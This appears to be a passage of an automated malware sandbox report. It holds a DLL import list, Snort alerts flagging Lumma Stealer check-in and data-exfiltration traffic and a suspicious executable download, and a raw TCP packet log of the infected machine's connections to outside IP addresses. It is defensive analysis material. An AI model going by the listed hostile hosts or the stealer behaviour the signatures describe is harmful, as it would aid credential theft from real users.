                                                                                                        KERNEL32.dllSetDefaultCommConfigA, WriteConsoleInputW, GetConsoleAliasesLengthW, GetConsoleAliasExesA, FindResourceW, ReadConsoleA, GetNamedPipeHandleStateA, GetModuleHandleExW, GetComputerNameW, FreeEnvironmentStringsA, FindNextVolumeMountPointA, EnumTimeFormatsW, GetCommandLineA, GetDriveTypeA, GetEnvironmentStrings, FindResourceExA, GetConsoleCP, LoadLibraryW, GetLocaleInfoW, SetConsoleCP, DeleteVolumeMountPointW, InterlockedPopEntrySList, GetFileAttributesA, HeapQueryInformation, SetSystemPowerState, GetCompressedFileSizeA, MultiByteToWideChar, GetVolumePathNameA, GetStartupInfoW, DisconnectNamedPipe, GetTempFileNameW, GetShortPathNameA, GetConsoleAliasesW, GetLastError, SetLastError, PeekConsoleInputW, MoveFileW, EnumSystemCodePagesW, SetComputerNameA, LoadLibraryA, LocalAlloc, SetCalendarInfoW, CreateHardLinkW, AddAtomW, RemoveDirectoryW, OpenJobObjectW, FindAtomA, GetTapeParameters, GetModuleHandleA, FindNextFileW, GetStringTypeW, VirtualProtect, PurgeComm, QueryPerformanceFrequency, FindFirstVolumeA, GetWindowsDirectoryW, GetCurrentProcessId, AddConsoleAliasA, ReadConsoleOutputCharacterW, SwitchToThread, GetCommandLineW, FlushFileBuffers, GetVolumeNameForVolumeMountPointA, WideCharToMultiByte, HeapFree, GetProcAddress, GetModuleHandleW, ExitProcess, DecodePointer, DeleteFileA, HeapReAlloc, HeapSetInformation, RaiseException, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapAlloc, IsProcessorFeaturePresent, HeapCreate, EnterCriticalSection, LeaveCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, WriteFile, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LCMapStringW, Sleep, SetStdHandle, GetConsoleMode, RtlUnwind, HeapSize, WriteConsoleW, ReadFile, CloseHandle, CreateFileW
                                                                                                        USER32.dllCharUpperBuffA, CharUpperA
                                                                                                        GDI32.dllGetCharWidthA, GetKerningPairsA

                                                                                                        Network Behavior

                                                                                                        Snort IDS Alerts

                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        192.168.2.3104.21.1.1849844802048094 10/03/23-18:02:47.032857TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4984480192.168.2.3104.21.1.18
                                                                                                        192.168.2.3172.67.137.12549832802048094 10/03/23-18:02:42.062053TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4983280192.168.2.3172.67.137.125
                                                                                                        91.227.16.22192.168.2.380498282018572 10/03/23-18:02:37.535570TCP2018572ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families)804982891.227.16.22192.168.2.3
                                                                                                        192.168.2.3104.21.1.1849840802048093 10/03/23-18:02:46.461905TCP2048093ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In4984080192.168.2.3104.21.1.18
                                                                                                        192.168.2.3104.21.1.1849909802048094 10/03/23-18:03:17.025877TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4990980192.168.2.3104.21.1.18
                                                                                                        192.168.2.3172.67.137.12549830802048093 10/03/23-18:02:41.476601TCP2048093ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In4983080192.168.2.3172.67.137.125
                                                                                                        192.168.2.3104.21.81.1749845802048094 10/03/23-18:02:47.044584TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4984580192.168.2.3104.21.81.17
                                                                                                        192.168.2.3172.67.151.21949846802048094 10/03/23-18:02:47.592349TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration4984680192.168.2.3172.67.151.219

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 3, 2023 18:02:19.253807068 CEST4980680192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:19.551857948 CEST8049806211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:19.551989079 CEST4980680192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:19.552223921 CEST4980680192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:19.552249908 CEST4980680192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:19.850085974 CEST8049806211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:20.682147980 CEST8049806211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:20.682205915 CEST8049806211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:20.685436964 CEST4980680192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:20.685537100 CEST4980680192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:20.816658974 CEST4981580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:20.983974934 CEST8049806211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:21.107414007 CEST8049815211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:21.107620001 CEST4981580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:21.107786894 CEST4981580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:21.107805014 CEST4981580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:21.398125887 CEST8049815211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:22.271910906 CEST8049815211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:22.271970034 CEST8049815211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:22.272097111 CEST4981580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:22.273392916 CEST4981580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:22.572447062 CEST8049815211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:22.692528009 CEST4981980192.168.2.3175.126.109.15
                                                                                                        Oct 3, 2023 18:02:22.978518009 CEST8049819175.126.109.15192.168.2.3
                                                                                                        Oct 3, 2023 18:02:22.978643894 CEST4981980192.168.2.3175.126.109.15
                                                                                                        Oct 3, 2023 18:02:22.978971958 CEST4981980192.168.2.3175.126.109.15
                                                                                                        Oct 3, 2023 18:02:22.978971958 CEST4981980192.168.2.3175.126.109.15
                                                                                                        Oct 3, 2023 18:02:23.264862061 CEST8049819175.126.109.15192.168.2.3
                                                                                                        Oct 3, 2023 18:02:24.088397026 CEST8049819175.126.109.15192.168.2.3
                                                                                                        Oct 3, 2023 18:02:24.088443041 CEST8049819175.126.109.15192.168.2.3
                                                                                                        Oct 3, 2023 18:02:24.088505030 CEST4981980192.168.2.3175.126.109.15
                                                                                                        Oct 3, 2023 18:02:24.088534117 CEST4981980192.168.2.3175.126.109.15
                                                                                                        Oct 3, 2023 18:02:24.374650002 CEST8049819175.126.109.15192.168.2.3
                                                                                                        Oct 3, 2023 18:02:24.513864040 CEST4982080192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:24.801259995 CEST8049820211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:24.801428080 CEST4982080192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:24.801732063 CEST4982080192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:24.801765919 CEST4982080192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:25.090599060 CEST8049820211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:26.086170912 CEST8049820211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:26.086188078 CEST8049820211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:26.086244106 CEST4982080192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:26.086358070 CEST4982080192.168.2.3211.104.254.139
                                                                                                        Oct 3, 2023 18:02:26.205190897 CEST4982180192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:26.374397993 CEST8049820211.104.254.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:26.497241974 CEST8049821211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:26.497402906 CEST4982180192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:26.497668982 CEST4982180192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:26.497668982 CEST4982180192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:26.788924932 CEST8049821211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:27.624469995 CEST8049821211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:27.624528885 CEST8049821211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:27.624617100 CEST4982180192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:27.761284113 CEST4982180192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:28.052737951 CEST8049821211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:28.313369989 CEST4982280192.168.2.3189.232.58.103
                                                                                                        Oct 3, 2023 18:02:28.520176888 CEST8049822189.232.58.103192.168.2.3
                                                                                                        Oct 3, 2023 18:02:28.520287991 CEST4982280192.168.2.3189.232.58.103
                                                                                                        Oct 3, 2023 18:02:28.520530939 CEST4982280192.168.2.3189.232.58.103
                                                                                                        Oct 3, 2023 18:02:28.520560980 CEST4982280192.168.2.3189.232.58.103
                                                                                                        Oct 3, 2023 18:02:28.727123976 CEST8049822189.232.58.103192.168.2.3
                                                                                                        Oct 3, 2023 18:02:29.219532013 CEST8049822189.232.58.103192.168.2.3
                                                                                                        Oct 3, 2023 18:02:29.219600916 CEST8049822189.232.58.103192.168.2.3
                                                                                                        Oct 3, 2023 18:02:29.219702005 CEST4982280192.168.2.3189.232.58.103
                                                                                                        Oct 3, 2023 18:02:29.219732046 CEST4982280192.168.2.3189.232.58.103
                                                                                                        Oct 3, 2023 18:02:29.361032963 CEST4982380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:29.426382065 CEST8049822189.232.58.103192.168.2.3
                                                                                                        Oct 3, 2023 18:02:29.656727076 CEST8049823211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:29.656882048 CEST4982380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:29.657171965 CEST4982380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:29.657202005 CEST4982380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:29.952924013 CEST8049823211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:30.749039888 CEST8049823211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:30.749063969 CEST8049823211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:30.749142885 CEST4982380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:30.749242067 CEST4982380192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:30.869292021 CEST4982480192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:31.044904947 CEST8049823211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:31.160334110 CEST8049824211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:31.160491943 CEST4982480192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:31.161660910 CEST4982480192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:31.161704063 CEST4982480192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:31.452636003 CEST8049824211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:32.259176016 CEST8049824211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:32.259341955 CEST4982480192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:32.259978056 CEST8049824211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:32.260039091 CEST4982480192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:32.382766962 CEST4982580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:32.550493956 CEST8049824211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:32.672280073 CEST8049825211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:32.672595978 CEST4982580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:32.672692060 CEST4982580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:32.672736883 CEST4982580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:32.962450981 CEST8049825211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:33.767180920 CEST8049825211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:33.767271042 CEST8049825211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:33.767326117 CEST4982580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:33.767362118 CEST4982580192.168.2.3211.40.39.251
                                                                                                        Oct 3, 2023 18:02:34.056617022 CEST8049825211.40.39.251192.168.2.3
                                                                                                        Oct 3, 2023 18:02:34.135354042 CEST4982680192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:34.436655045 CEST8049826211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:34.436858892 CEST4982680192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:34.437017918 CEST4982680192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:34.437056065 CEST4982680192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:34.738220930 CEST8049826211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:35.304569960 CEST8049826211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:35.304588079 CEST8049826211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:35.304683924 CEST4982680192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:35.304828882 CEST4982680192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:35.423382044 CEST4982780192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:35.606298923 CEST8049826211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:35.733690023 CEST8049827211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:35.733769894 CEST4982780192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:35.734071016 CEST4982780192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:35.734102964 CEST4982780192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:36.039632082 CEST8049827211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:36.849296093 CEST8049827211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:36.849318027 CEST8049827211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:36.849562883 CEST4982780192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:36.849562883 CEST4982780192.168.2.3211.171.233.129
                                                                                                        Oct 3, 2023 18:02:37.088711977 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.154580116 CEST8049827211.171.233.129192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.310822964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.311039925 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.311343908 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.532987118 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.535569906 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.535650015 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.535677910 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.535711050 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.535734892 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.535789967 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.535823107 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.535852909 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.535904884 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.535906076 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.535984039 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.536020041 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.536048889 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.536139965 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.536180019 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.757522106 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.758188963 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.758261919 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.758622885 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.758857965 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.758913994 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.758960962 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759113073 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759160995 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.759170055 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759234905 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759285927 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759290934 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.759341002 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759391069 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.759418964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759480000 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759526968 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.759634972 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759718895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.759763956 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.759915113 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.760006905 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.760057926 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.760234118 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.760463953 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.760514975 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.760755062 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.760970116 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.761017084 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.980504036 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.980529070 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.980542898 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.980654001 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.980757952 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.980772018 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.980809927 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.980829954 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.980866909 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.980871916 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.980937004 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.980986118 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.981025934 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981097937 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981164932 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.981173038 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981268883 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981317997 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981319904 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.981388092 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981439114 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.981477022 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981537104 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981586933 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.981637001 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981698990 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981750965 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.981775999 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981827974 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981874943 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.981899977 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.981966972 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982016087 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.982079029 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982167006 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982213020 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.982222080 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982300997 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982358932 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.982377052 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982476950 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982531071 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.982570887 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982662916 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982712984 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.982749939 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982805967 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982850075 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.982876062 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982944012 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.982995987 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.983033895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.983079910 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.983130932 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.983139992 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.983191013 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.983237982 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:37.983254910 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.983741045 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:37.983791113 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.203057051 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203079939 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203085899 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203092098 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203100920 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203139067 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203239918 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203336000 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203413963 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203427076 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.203427076 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.203526974 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203586102 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.203658104 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.204080105 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204091072 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204128027 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204174042 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204231977 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204245090 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.204245090 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.204334021 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204334021 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.204387903 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204427004 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204457045 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.204494953 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204550028 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204551935 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.204607964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204663038 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.204683065 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204735041 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204773903 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.204781055 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204904079 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.204957962 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.205024958 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.205089092 CEST804982891.227.16.22192.168.2.3
